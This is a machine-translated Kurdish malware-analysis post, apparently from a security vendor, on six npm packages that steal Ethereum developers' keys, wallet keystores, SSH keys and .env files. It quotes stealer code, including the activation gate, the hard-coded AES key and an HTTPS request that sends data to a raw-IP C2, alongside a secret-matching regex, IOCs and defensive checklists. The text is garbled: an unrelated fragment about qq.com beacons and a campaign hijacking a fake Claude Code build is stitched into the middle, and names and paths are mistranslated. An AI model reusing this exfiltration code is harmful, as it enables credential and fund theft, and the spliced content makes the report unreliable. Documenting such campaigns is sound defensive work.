TL; DR
Di 6ê Gulana 2026an de, yek weşangerê npm, namikazesarada010206, şeş pakêtên zirardar şandin ku ekosîstema pêşdebirên Ethereum, Solidity, û DeFi hedef digirin.
Pakêtan, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, û web3-utils-core, navên maqûl bi kar anîn ku wekî pirtûkxaneyên alîkar ji bo amûrên populer ên Web3 xuya dikirin.
Her şeş pakêtan heman tişt dihewîne telemetry.js pel. Pelê li seranserê klusterê bi baytê wekhev bû, bi SHA-256:
Malware di dema sazkirinê de kar nake. Tune ye preinstall or postinstall çengelê. Di şûna wê de, dema ku pakêt bi rêya tê hinartin çalak dibe require().
Ew hûrgilî girîng e.
Împlant li bendê dimîne heta ku pêşdebir bi rastî pakêtê bikar bîne. Dûv re ew kontrol dike ka stasyona kar dişibihe jîngehek pêşveçûnê ya Ethereum / Solidity ya rastîn. Ew li mifteyên Alchemy an Infura, mifteyên taybet, mnemonics, mifteyên bicîhker, an peldankek Foundry ya herêmî digere.
Eger mêvandar li hev bike, diz mifteyên taybet ên SSH, depoyên mifteyên berîka Foundry / Geth / Brownie berhev dike, .env* pelan, û guhêrbarên hawîrdora hesas. Ew pakêtê bi AES-256-GCM şîfre dike û bi karanîna şîfreyek hişk-kodkirî wê dişîne xalek dawî ya IPv4 C2 ya xav bi verastkirina TLS-ê ya neçalak.
Sîstema Hişyariya Zû ya Malware (MEW) ya Xygeni her şeş pakêt wekî zirardar piştrast kir. Pakêta rapora rakirina qeyda npm li benda wergirtinê ye.
Kom: Şeş Pakêt, Yek Weşanxane
Hesabê weşanger namikazesarada010206 bi navnîşana Gmail a nehatî verastkirin ve girêdayî bû namikazesarada010206@gmail.com.
Kampanya di 6ê Gulana 2026an de wekî weşaneke rojane derket holê. Her şeş pakêt wekî guhertoyên wan hatin çêkirin. 1.0.0, ti girêdayîbûna dema xebitandinê tunebû, û tenê sê pel şandin:
package.json index.js telemetry.js Wan heman depoya çavkaniyê jî ragihand:
https://github.com/harunosakura030303-maker/evmchain-config Sê pakêtên pêşîn di weşana yekem de ji hêla skenerên MEW ve hatin dîtin. Sê pakêtên mayî piştî nirxandina analîstan a profîla npm ya weşanger bi zorê hatin nîşankirin. Carekê heman byte-yeksan telemetry.js li seranserê komê hate piştrast kirin, ew bi domdarî wekî zirardar hatin girtin.
| Pakêt | Awa | npm Hatiye Weşandin | Bilêta MEW | Hûkûm |
|---|---|---|---|---|
| viem-core | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Malav |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | Malav |
| amûrên-core-hardhat | 1.0.0 | 2026-05-06 | #51051 | Malav |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | Xerabkar, bi domdarî |
| amûrên şûştinê | 1.0.0 | 2026-05-06 | #51071 | Xerabkar, bi domdarî |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | Xerabkar, bi domdarî |
Stratejiya navlêkirinê rasterast lê bi bandor e.
Ev pakêt navên rastîn ên jorîn teqlîd nakin. Di şûna wê de, ew paşgirên "bikêrhatî" yên maqûl bikar tînin wekî -core, -utils, û -utils-coreEv yek wan dişibîne pirtûkxaneyên hevalbend ku pêşdebir dibe ku li bendê be ku nêzîkî amûrên Web3 bibîne.
| Pakêta Xerabkar | Armanceke Rewa |
|---|---|
| viem-core | viem, xerîdarek populer a Ethereum TypeScript |
| viem-utils-core | viem |
| amûrên-core-hardhat | hardhat, hawîrdorek pêşveçûna Solidity ya sereke |
| evm-utils | Navdêrgeha amûrên EVM-ê yên gelemperî |
| amûrên şûştinê | kargeha şûştinê, zincîreke amûrên Solidity |
| web3-utils-core | web3-utils, alîkarên Web3.js |
Ev qalibê "pakêta pêvek" e: ne "Ez pakêta rastîn im," lê "Ez di dora pakêta rastîn de wekî alîkarekî maqûl xuya dikim."
Ji bo pêşdebirên DeFi yên ku bi lez tevdigerin, ev ji bo afirandina xetereyê bes e.
Dema ku pakêt tê îtxalkirin çi dibe
Zincîra êrîşê piçûk, bi zanebûn e, û li ser jîngehên pêşxistina krîptoyê disekine.
Çengek sazkirinê tune. Di şûna wê de, her pakêtek tê de heye index.js ku fonksiyona stubê hinarde dike û dûv re modula telemetrîyê ya zirardar bar dike.
require('./telemetry').init(); Ev tê vê wateyê ku malware di importkirina yekem de çalak dibe.
Ev ji bo êrîşkar ji hêla operasyonel ve bikêrhatî ye. Gelek skaner û sandbox li ser tevgera dema sazkirinê disekinin. Ev pakêt li bendê ye heta ku bi rastî ji hêla pêşdebir, skrîpta avakirinê, koma ceribandinê, an rêya dema xebitandinê ve were bikar anîn.
Deriyê Çalakkirinê: Tenê li ser Îstasyonên Kar ên Pêşdebirên Web3 yên Rastîn Bixebite
Beşa herî girîng a implantê deriyê çalakkirinê ye.
Malware guherbarên jîngehê yên ku bi gelemperî li ser makîneyên pêşdebirên Ethereum / Solidity têne dîtin kontrol dike:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Ew her weha kontrol dike ka Foundry xuya dike ku hatiye sazkirin:
fs.existsSync(path.join(os.homedir(), '.foundry')) Eger yek ji şertan jî rast nebe, fonksiyon vedigere û tiştekî nake.
Ev yek pakêtê di hawîrdorên analîzên gelemperî de bêdengtir dike. Qutîkek bê mifteyên Foundry, Alchemy, mifteyên Infura, mifteyên taybet, an mnemonics dibe ku bandorek bêzerar bibîne.
Li ser hosteke hevber, malware berî berhevkirinê 60 heta 90 saniye li bendê dimîne:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Ev derengketin têkiliya eşkere ya di navbera hawirdekirin û derxistinê de kêm dike. .unref() bang di heman demê de dihêle ku pêvajoya mêvandar bi awayekî normal derkeve ger pakêt di skrîptek kurt-temen de hatibe import kirin.
Ev ne tevgereke bi deng û qîmet a "şikandin û girtin" e. Ew diziyeke hedefgirtî ye ku ji bo dûrketina ji xebitandinê hatiye çêkirin, heya ku jîngeha pêşdebiran ne hêjayî dizînê be.
Tiştên ku Diz Berhev Dike
Dema ku deriyê aktîvkirinê derbas dibe, malware ji çavkaniyên ku di pêşveçûna Web3-ê de herî girîng in berhev dike: mifteyên taybet, depoyên mifteyên berîkan, bawernameyên bicihkirinê, razên ewr, nîşanekanên npm, û veavakirina projeya herêmî.
| Kanî | Çi tê berhevkirin |
|---|---|
| pêvajo.env | Her guhêrbarek ku li gorî /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ye |
| ~/.ssh/* | Pelên ku PRIVATE KEY an BEGIN OPENSSH dihewînin, tevî naveroka tevahî ya pelê |
| ~/.foundry/kilîtfiroşgeh/* | Pelên depoya mifteyê ya berîka Foundry |
| ~/.ethereum/kilîstore/* | Pelên depoya mifteyê ya berîka Geth |
| ~/.brownie/hesab/* | Pelên depoya mifteyê ya berîka Brownie |
| ${cwd}/.env | Naveroka tevahî ya pelê |
| ${cwd}/.env.local | Naveroka tevahî ya pelê |
| ${cwd}/.env.production | Naveroka tevahî ya pelê |
| ${cwd}/.env.development | Naveroka tevahî ya pelê |
| os.hostname() | Metadataya mêvandar |
| crypto.randomUUID() | Nasnameya qurbanî/danişînê |
| Dîrok.niha() | Demjimêra berhevkirinê |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com Nîşaneyên ATTA ev in:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Em nekarîn piştrast bikin ka telemetrî analîtîkên operator bi xwe ne an kanalek cuda ya pere-kirî ye. Tokenên ATTA di her du nimûneyên ku me lêkolîn kirine de yek in.
Koma B: heibai
claude.hk OAuth Phishing + ANTHROPIC_BASE_URL Hijack
Nimûneya 1ê Nîsanê baskê herî xav û berê yê kampanyayê ye.
heibai:2.1.88-claude.hk-4 ji hêla hate weşandin wuguoqiangvip28, hesabek ku di 7ê Hezîrana 2025an de hatiye afirandin. Pakêt bi eşkereyî xwe li dijî ya rewa guherto kir. 2.1.88 Berdana Antropîk.
Ew bi CA-certificate MITM re eleqedar nabe. Di şûna wê de, ew li ser xala dawî ya OAuth derewan li bikarhêner dike.
Lêzêdekirinên xerabkar ên li ser çavkaniya Claude Code ya derketî ev in:
| Kanî | Çi tê berhevkirin |
|---|---|
| pêvajo.env | Her guhêrbarek ku li gorî /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ye |
| ~/.ssh/* | Pelên ku PRIVATE KEY an BEGIN OPENSSH dihewînin, tevî naveroka tevahî ya pelê |
| ~/.foundry/kilîtfiroşgeh/* | Pelên depoya mifteyê ya berîka Foundry |
| ~/.ethereum/kilîstore/* | Pelên depoya mifteyê ya berîka Geth |
| ~/.brownie/hesab/* | Pelên depoya mifteyê ya berîka Brownie |
| ${cwd}/.env | Naveroka tevahî ya pelê |
| ${cwd}/.env.local | Naveroka tevahî ya pelê |
| ${cwd}/.env.production | Naveroka tevahî ya pelê |
| ${cwd}/.env.development | Naveroka tevahî ya pelê |
| os.hostname() | Metadataya mêvandar |
| crypto.randomUUID() | Nasnameya qurbanî/danişînê |
| Dîrok.niha() | Demjimêra berhevkirinê |
Lîsteya hedefan pir taybet e. Ev ne diziya gerokên gelemperî ye an jî berhevkirina bawernameyên berfireh e. Ew ji bo pêşdebirên ku sepanên Ethereum ava dikin, diceribînin, bicîh dikin, an jî dixebitînin e.
Têxistina depoyên mifteyên Foundry, Geth, û Brownie bi taybetî girîng e. Ev pel dikarin gihîştina rasterast a berîkan an nasnameyên bicihkirinê temsîl bikin. Ger êrîşkar bikaribe wan bi şîfreyan, mnemonîk, an razên jîngehê ve girêbide, dibe ku ew bikaribin fonan veguhezînin, xwe wekî bicihker nîşan bidin, an jî operasyonên peymanên jîr bixin xeterê.
Şîfrekirin Berî Derxistinê
Malware daneyên berhevkirî berî şandina wan şîfre dike.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Şîfreya kodkirî ya hişk ev e:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Barkêşiya dawî wekî JSON tê pêçandin:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Şîfrekirin bi tena serê xwe malware pêşketîtir nake. Lêbelê, ew vekolîna torê dijwartir dike. Parêzerek ku li derketinê dinêre dê barkêşek JSON bibîne, lê mifteyên dizî, pelên berîkan, an jî... .env naverok bêyî şîfreya hişk-kodkirî û mantiqa şîfrekirinê.
Derxistina bo IPv4 C2-ya Raw
Riya derxistinê bi kodeke hişk hatiye amadekirin:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Malware daneyan dişîne bo:
https://76.13.37.80:8443/api/v1/telemetry Du hûrgulî diyar dibin.
Pêşî, C2 navnîşaneke IPv4 ya xav e ne domainek e. Ev yek pêwîstiya qeydkirina domainê ji holê radike û hin tespîtên li ser bingeha domainê asteng dike.
Duyemîn, verastkirina TLS bi van tiştan neçalak e:
rejectUnauthorized: false Ev yek dihêle ku malware her sertîfîkayekê, tevî sertîfîkayên xwe-îmzekirî jî, qebûl bike. Bi gotineke din, êrîşkar bêyî ku hewcedariya wî bi sertîfîkayek giştî ya derbasdar hebe, veguhastina şîfrekirî distîne.
Mantîqa ji nû ve ceribandinê û hosteke paşveger tune. Çewtî bi bêdengî têne daqurtandin. Ev pakêtê bêdeng dihêle heke C2 negirêdayî be an jî negihîştî be.
Çima Ev Kampanya Girîng e
Piraniya pakêtên npm yên xerabkar ên ku ji bo pêşdebiran hatine çêkirin, li pey bawernameyên berfireh in: nîşaneyên npm, mifteyên AWS, nîşaneyên GitHub, an .npmrc Pelan
Ev kampanya hedefê teng dike.
Ew li nîşanên ku makîne aîdî pêşdebirê Ethereum an Solidity ye digere. Dûv re ew tam wan hebûnên ku di wê jîngehê de girîng in dikişîne: depoyên mifteyên berîkan, mifteyên taybet, mnemonîk, mifteyên bicîhker, .env pelan, û mifteyên SSH.
Ev yek kampanyayê ji bo tîmên Web3 ji dizek npm-ê ya gelemperî xeternaktir dike.
Infeksiyonek serketî dikare eşkere bike:
- Berîkên bicihkirinê
- Bişkojkên rêveberiya peymana jîr
- Kilîtên dabînkerê RPC
- Pêzanînên bicihkirina ewr
- nîşaneyên weşanê yên npm
- Gihîştina SSH bo pêşdebir an avakirina binesaziyê
- Nehêniyên projeyê ku tê de hatine tomarkirin
.envfiles - Depoyên mifteyên berîkan ji bo Foundry, Geth, an Brownie
Navên pakêtan jî endezyariya civakî ya zelal nîşan didin. Ew bi navên amûrên naskirî ekosîstema pêşdebirên Web3 hedef digirin: viem, hardhat, foundry, evm, û web3.
Pêwîst nake aktor projeyên rastîn bixe xeterê. Tenê pêdivî bi pêşdebirekî heye ku tiştek ku dişibihe pakêtek hevalbend a maqûl saz bike.
Nîşaneyên Têkçûnê û Tesbîtkirinê
| Pakêt û Weşanxane | |
|---|---|
| Erd | Giranî |
| weşanxaneya npm | namikazesarada010206 |
| E-nameya weşanger | namikazesarada010206@gmail.com |
| E-name hate piştrast kirin | Na |
| SCM nirxandin | Na |
| Pûana navûdengê | 1.0 |
| pakêtên | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| guhertoyên | Hemû 1.0.0 |
| Depoya çavkaniyê | https://github.com/harunosakura030303-maker/evmchain-config |
| Xirabkar hatiye piştrastkirin | Her şeş pakêt |
| Têkelî | |
|---|---|
| Awa | Giranî |
| Xala dawî ya C2 | https://76.13.37.80:8443/api/v1/telemetry |
| C2 IP | 76.13.37.80 |
| Porta C2 | 8443/tcp |
| Reftara TLS | redkirinBêdestûr: derewîn |
| Şêma bargiraniyê | {"v":2,"iv": "d": "t": } |
| Pel û Haş | |
|---|---|
| Awa | Giranî |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Şêweya pakêtê | pakêt.json, îndeks.js, telemetry.js |
| Hejmara pelan | 3 |
| Mezinahiya giştî ya texmînî | 3.4 KB |
Sînyalên Aktîvkirinê
Malware van guherbarên jîngehê kontrol dike:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Ew her weha kontrol dike ji bo:
~/.foundry/ Rêyên Mêvandar ên Armanckirî
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Koleksiyona Regex
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Nîşeyên Tesbîtkirinê
Çend rêzik vê kampanyayê bêyî hewcedariya analîzek tevgerî ya tevahî digirin.
Pêşî, lockfiles ji bo şeş navên pakêtên zirardar bişopîne:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Her maçek di package-lock.json, yarn.lock, pnpm-lock.yaml, an node_modules Divê dîrok wekî bûyerek girîng were nirxandin.
Ya duyemîn, pêvajoyên Node.js ên ku rêyên depoya mifteyê ya berîkan dixwînin bişopînin:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Ev ji bo pakêtek ku wekî girêdayîbûnek alîkar tê hinartin kêm caran tevgereke rewa ye. Bi taybetî dema ku çalakiya tora derketî tê şopandin, gumanbar e.
Ya sêyemîn, girêdanên HTTPS-ê asteng bikin an jî hişyar bikin ji bo:
76.13.37.80:8443 Bi taybetî jî dema ku rêya daxwazê ev e:
/api/v1/telemetry Çaremîn, li pakêtên npm-ê bigerin ku van taybetmendiyan li hev dicivînin:
- Weşangerê nû an jî bi navûdengek kêm
- Hesabê Gmailê yê nehatî verastkirin
- Navê pakêta Web3-yê ya li kêleka
- Dîroka depoya watedar tune ye
- Şêweya pakêta piçûk
index.jsku pelê telemetrî an alîkar bar dike- Girêdayîbûnên di dema xebitandinê de tune ne
- Berhevkirina guhêrbar-hawîrdorê ya hesas
- Gihîştina depoya mifteyê ya Wallet
Ev şablon ji IOC-yek yekane bikêrtir e ji ber ku pakêta din dibe ku navnîşana IP-ê biguherîne lê heman mantiqa armancgirtinê biparêze.
Lîsteya Kontrolê ya Bersiva Lihevkirinê
Eger pêşdebirekî yek ji şeş pakêtan bi kar anîbe û jîngeha wan bi deriyê aktîvkirinê re li hev bike, stasyona xebatê wekî xeternak bihesibîne.
Ev yek makîneyên ku Foundry-yê sazkirî, mifteyên Alchemy an Infura di jîngehê de, mifteyên taybet, mnemonîk, an mifteyên bicihkerê tê de hene.
Bersiva pêşniyarkirî:
- Mêvandar ji torê veqetîne.
- Biparêze
node_modules, pelên kilîtkirî, dîroka qalikê, û tomarên têkildar ji bo lêkolînên dadwerî. - Her cotek mifteya SSH-ê li jêr bizivirîne
~/.ssh/. - Ji bo her depoya mifteyan a li jêr mifteyên berîkan bizivirîne
~/.foundry,~/.ethereum, û~/.brownie. - Pereyan veguhezînin berîkên nû.
- Her razên ku tê de hatine hilanîn bizivirînin
.env*pelên di depoyên ku pêşdebir tê de xebitî de. - Nehêniyên jîngehê yên ku bi regexa berhevokê re li hev dikin bizivirînin, di nav de mifteyên AWS, nîşanên npm, nîşanên bicihkirinê, mifteyên API, mifteyên taybet, tov û mnemonîk.
- Ewrê venêrînê, npm, GitHub, dabînkerê RPC, û çalakiya zincîra blokê ji dema sazkirina pakêtê ve.
- Berî ku ji nû ve were bikaranîn, wêneyê stasyona kar ji nû ve çêbikin.
Tiştên ku Divê Parêzer Bibin
Ev kampanya nîşan dide ka çawa npm typosquatting li dora ekosîstemên pêşdebirên nirxbilind pêş dikeve.
Pêwîstiya lîstikvan bi berdewamiyê tunebû. Pêwîstiya wan bi şaşkirinê tunebû. Heta pêwîstiya wan bi pêkanîna di dema sazkirinê de jî tunebû.
Di şûna wê de, ew li ser sê tiştan pabend bûn:
- Navên pakêtên Web3 yên pêbawer
- Tenê li ser makîneyên rastîn ên pêşxistina krîptoyê çalakkirin
- Dizîna rasterast a pelan û razên ku ji bo pêşdebirên Ethereumê herî girîng in
Ev yek dibe sedema ku kampanya di şopandina berfireh de bi hêsanî neyê dîtin û dema ku di hawîrdora rast de dakeve xeterdar be.
Ji bo tîmên Web3, ders zelal e: navên girêdayîbûnê wekî beşek ji modela tehdîda xwe bihesibînin. Pakêtek ku dişibihe alîkarek bêzerar hîn jî dikare bibe rêya herî kurt a ber bi xetereya berîka we ve.
Ji qeyda npm re hat ragihandin. Dema ku hesabê weşanger û pakêt werin rakirin, em ê vê postê nûve bikin.




